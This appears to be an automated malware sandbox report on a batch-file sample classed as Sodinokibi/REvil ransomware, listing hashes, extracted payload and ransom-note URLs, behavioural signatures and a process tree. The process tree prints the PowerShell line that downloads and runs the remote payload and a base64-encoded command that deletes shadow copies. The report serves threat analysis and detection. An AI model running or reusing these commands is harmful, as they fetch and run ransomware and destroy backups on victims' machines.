Analysis
-
max time kernel
132s -
max time network
138s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
15-05-2020 19:19
Static task
static1
Behavioral task
behavioral1
Sample
74b8e8ad8fe5aea82ec95a707e3c2b94.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
74b8e8ad8fe5aea82ec95a707e3c2b94.bat
Resource
win10v200430
General
-
Target
74b8e8ad8fe5aea82ec95a707e3c2b94.bat
-
Size
214B
-
MD5
220dc0fc858c664ba5223cbab7e4b312
-
SHA1
94f095bd648c7c3f4845e3c419b74baa7662f2ae
-
SHA256
94d89a44ea5da3649df80f6898cb30415f2df92c0060d36d5f9afa3806862a2a
-
SHA512
119c413acb39f51f4d668c5bc48793f60b91717e1623e22d666221c26e78cfa3667e7aa2141b26e15aa3936d86ba498ae280decd9889a77f8706459d0f295772
Malware Config
Extracted
http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94
Extracted
C:\37e3wa1803-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/14D2FFAA80AE78FE
http://decryptor.cc/14D2FFAA80AE78FE
Signatures
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1060 powershell.exe 1060 powershell.exe 1060 powershell.exe 1764 powershell.exe 1764 powershell.exe -
Blacklisted process makes network request 67 IoCs
Processes:
powershell.exeflow pid process 1 1060 powershell.exe 5 1060 powershell.exe 7 1060 powershell.exe 9 1060 powershell.exe 11 1060 powershell.exe 13 1060 powershell.exe 14 1060 powershell.exe 16 1060 powershell.exe 17 1060 powershell.exe 19 1060 powershell.exe 20 1060 powershell.exe 22 1060 powershell.exe 24 1060 powershell.exe 26 1060 powershell.exe 27 1060 powershell.exe 29 1060 powershell.exe 31 1060 powershell.exe 32 1060 powershell.exe 34 1060 powershell.exe 35 1060 powershell.exe 37 1060 powershell.exe 39 1060 powershell.exe 41 1060 powershell.exe 42 1060 powershell.exe 44 1060 powershell.exe 48 1060 powershell.exe 50 1060 powershell.exe 51 1060 powershell.exe 54 1060 powershell.exe 55 1060 powershell.exe 57 1060 powershell.exe 58 1060 powershell.exe 60 1060 powershell.exe 61 1060 powershell.exe 63 1060 powershell.exe 64 1060 powershell.exe 66 1060 powershell.exe 68 1060 powershell.exe 69 1060 powershell.exe 71 1060 powershell.exe 73 1060 powershell.exe 74 1060 powershell.exe 76 1060 powershell.exe 77 1060 powershell.exe 79 1060 powershell.exe 81 1060 powershell.exe 83 1060 powershell.exe 85 1060 powershell.exe 87 1060 powershell.exe 89 1060 powershell.exe 90 1060 powershell.exe 93 1060 powershell.exe 94 1060 powershell.exe 96 1060 powershell.exe 98 1060 powershell.exe 100 1060 powershell.exe 102 1060 powershell.exe 104 1060 powershell.exe 106 1060 powershell.exe 108 1060 powershell.exe 109 1060 powershell.exe 111 1060 powershell.exe 112 1060 powershell.exe 114 1060 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\genfu65za5.bmp" powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1060 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 280 wrote to memory of 1060 280 cmd.exe powershell.exe PID 1060 wrote to memory of 1764 1060 powershell.exe powershell.exe PID 1060 wrote to memory of 1764 1060 powershell.exe powershell.exe PID 1060 wrote to memory of 1764 1060 powershell.exe powershell.exe PID 1060 wrote to memory of 1764 1060 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1060 powershell.exe Token: SeDebugPrivilege 1060 powershell.exe Token: SeDebugPrivilege 1764 powershell.exe Token: SeBackupPrivilege 1604 vssvc.exe Token: SeRestorePrivilege 1604 vssvc.exe Token: SeAuditPrivilege 1604 vssvc.exe Token: SeTakeOwnershipPrivilege 1060 powershell.exe -
Drops file in Program Files directory 26 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\37e3wa1803-readme.txt powershell.exe File created \??\c:\program files (x86)\37e3wa1803-readme.txt powershell.exe File opened for modification \??\c:\program files\CloseCompare.001 powershell.exe File opened for modification \??\c:\program files\SkipExpand.ttc powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\37e3wa1803-readme.txt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\37e3wa1803-readme.txt powershell.exe File opened for modification \??\c:\program files\ProtectRevoke.xla powershell.exe File opened for modification \??\c:\program files\RedoRestart.asf powershell.exe File opened for modification \??\c:\program files\SyncExit.TS powershell.exe File opened for modification \??\c:\program files\WatchSync.vb powershell.exe File opened for modification \??\c:\program files\ConvertFromCompare.aiff powershell.exe File opened for modification \??\c:\program files\DebugConnect.shtml powershell.exe File opened for modification \??\c:\program files\DenyAssert.3gp2 powershell.exe File opened for modification \??\c:\program files\MergePop.gif powershell.exe File opened for modification \??\c:\program files\NewMount.3gpp powershell.exe File opened for modification \??\c:\program files\UnblockExpand.dot powershell.exe File opened for modification \??\c:\program files\WatchLimit.jpeg powershell.exe File opened for modification \??\c:\program files\UseWait.mpeg powershell.exe File opened for modification \??\c:\program files\CheckpointNew.pcx powershell.exe File opened for modification \??\c:\program files\ClearUnlock.snd powershell.exe File opened for modification \??\c:\program files\InitializeSubmit.vstm powershell.exe File opened for modification \??\c:\program files\MountCopy.docx powershell.exe File opened for modification \??\c:\program files\PushPop.MTS powershell.exe File opened for modification \??\c:\program files\RegisterGet.mp4 powershell.exe File opened for modification \??\c:\program files\RenameSplit.gif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\37e3wa1803-readme.txt powershell.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\74b8e8ad8fe5aea82ec95a707e3c2b94.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:280 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/74b8e8ad8fe5aea82ec95a707e3c2b94');Invoke-ZUMTYKU;Start-Sleep -s 10000"2⤵
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Modifies system certificate store
PID:1060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1764
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1604